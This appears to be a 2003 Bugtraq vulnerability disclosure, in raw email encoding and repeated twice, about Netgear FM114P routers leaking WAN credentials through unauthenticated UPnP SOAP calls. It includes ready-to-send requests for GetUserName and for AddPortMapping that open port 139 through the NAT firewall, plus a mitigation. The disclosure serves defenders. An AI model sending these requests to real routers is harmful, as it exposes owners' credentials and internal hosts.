=?iso-8859-1?Q?Bj=F6rn_Stickler?=
04/04/03, 01:05
ADDITION:
=B0=B0=B0=B0=B0=B0=B0=B0=B0
it seems that several routers from level-one are also vulnerable to the
method described.=20
and another nice feature is adding port mappings for passing through
nat-firewall.
--- sample for passing port 139 (netbios) from internal ip 192.168.0.2: =
---
POST /upnp/service/WANPPPConnection HTTP/1.1
Content-Type: text/xml; charset=3D"utf-8"
SOAPAction: =
"urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"
User-Agent: Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
Host: 192.168.0.1
Content-Length: 1123
Connection: Keep-Alive
Pragma: no-cache
<?xml version=3D"1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV=3D"http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle=3D"http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping =
xmlns:m=3D"urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewRemoteHost xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"string"></NewRemoteHost>
<NewExternalPort xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"ui2">139</NewExternalPort>
<NewProtocol xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"string">TCP</NewProtocol>
<NewInternalPort xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"ui2">139</NewInternalPort>
<NewInternalClient xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"string">192.168.0.6</NewInternalClient>
<NewEnabled xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"boolean">1</NewEnabled>
<NewPortMappingDescription =
xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"string">NetBios</NewPortMappingDescription>
<NewLeaseDuration xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"ui4">0</NewLeaseDuration>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
regards, b.stickler
-----Original Message-----
From: Bj=F6rn Stickler [mailto:stickler@rbg.informatik.tu-darmstadt.de]=20
Sent: Mittwoch, 2. April 2003 19:59
To: 'bugtraq@securityfocus.com'
Cc: 'betabugs@netgear.com'
hi,
i found another security problem in netgear prosafe wireless router =
model
FM114P:
when remote-access and upnp features are enabled, the WAN connection
username and password can be retrieved without any authentication using
upnp. if remote management is enabled anyone can do this from the web. =
this
is done by using upnp soap requests to the router with the functions
GetUserName and GetPassword. i don=B4t know why such functions exist, =
because
router configuration is normally done via web-interface.
---- begin of example request to get username --------------
POST /upnp/service/WANPPPConnection HTTP/1.1
HOST: 192.168.0.1:80
SOAPACTION: =
"urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset=3D"utf-8"
Content-Length: 289
<?xml version=3D"1.0" encoding=3D"utf-8"?>
<s:Envelope =
s:encodingStyle=3D"http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s=3D"http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<u:GetUserName
xmlns:u=3D"urn:schemas-upnp-org:service:WANPPPConnection:1" />
</s:Body>
</s:Envelope>
---- end of example request to get username --------------
affected firmware versions: --> v1.4 Beta Release 21 has been tested
--> all previous versions with upnp may be
affected
solution: disable remote management and/or upnp until bug is fixed by
netgear
regards, b.stickler
http://intex.ath.cx
=B0=B0=B0=B0=B0=B0=B0=B0=B0
it seems that several routers from level-one are also vulnerable to the
method described.=20
and another nice feature is adding port mappings for passing through
nat-firewall.
--- sample for passing port 139 (netbios) from internal ip 192.168.0.2: =
---
POST /upnp/service/WANPPPConnection HTTP/1.1
Content-Type: text/xml; charset=3D"utf-8"
SOAPAction: =
"urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"
User-Agent: Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
Host: 192.168.0.1
Content-Length: 1123
Connection: Keep-Alive
Pragma: no-cache
<?xml version=3D"1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV=3D"http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle=3D"http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping =
xmlns:m=3D"urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewRemoteHost xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"string"></NewRemoteHost>
<NewExternalPort xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"ui2">139</NewExternalPort>
<NewProtocol xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"string">TCP</NewProtocol>
<NewInternalPort xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"ui2">139</NewInternalPort>
<NewInternalClient xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"string">192.168.0.6</NewInternalClient>
<NewEnabled xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"boolean">1</NewEnabled>
<NewPortMappingDescription =
xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"string">NetBios</NewPortMappingDescription>
<NewLeaseDuration xmlns:dt=3D"urn:schemas-microsoft-com:datatypes"
dt:dt=3D"ui4">0</NewLeaseDuration>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
regards, b.stickler
-----Original Message-----
From: Bj=F6rn Stickler [mailto:stickler@rbg.informatik.tu-darmstadt.de]=20
Sent: Mittwoch, 2. April 2003 19:59
To: 'bugtraq@securityfocus.com'
Cc: 'betabugs@netgear.com'
hi,
i found another security problem in netgear prosafe wireless router =
model
FM114P:
when remote-access and upnp features are enabled, the WAN connection
username and password can be retrieved without any authentication using
upnp. if remote management is enabled anyone can do this from the web. =
this
is done by using upnp soap requests to the router with the functions
GetUserName and GetPassword. i don=B4t know why such functions exist, =
because
router configuration is normally done via web-interface.
---- begin of example request to get username --------------
POST /upnp/service/WANPPPConnection HTTP/1.1
HOST: 192.168.0.1:80
SOAPACTION: =
"urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset=3D"utf-8"
Content-Length: 289
<?xml version=3D"1.0" encoding=3D"utf-8"?>
<s:Envelope =
s:encodingStyle=3D"http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s=3D"http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<u:GetUserName
xmlns:u=3D"urn:schemas-upnp-org:service:WANPPPConnection:1" />
</s:Body>
</s:Envelope>
---- end of example request to get username --------------
affected firmware versions: --> v1.4 Beta Release 21 has been tested
--> all previous versions with upnp may be
affected
solution: disable remote management and/or upnp until bug is fixed by
netgear
regards, b.stickler
http://intex.ath.cx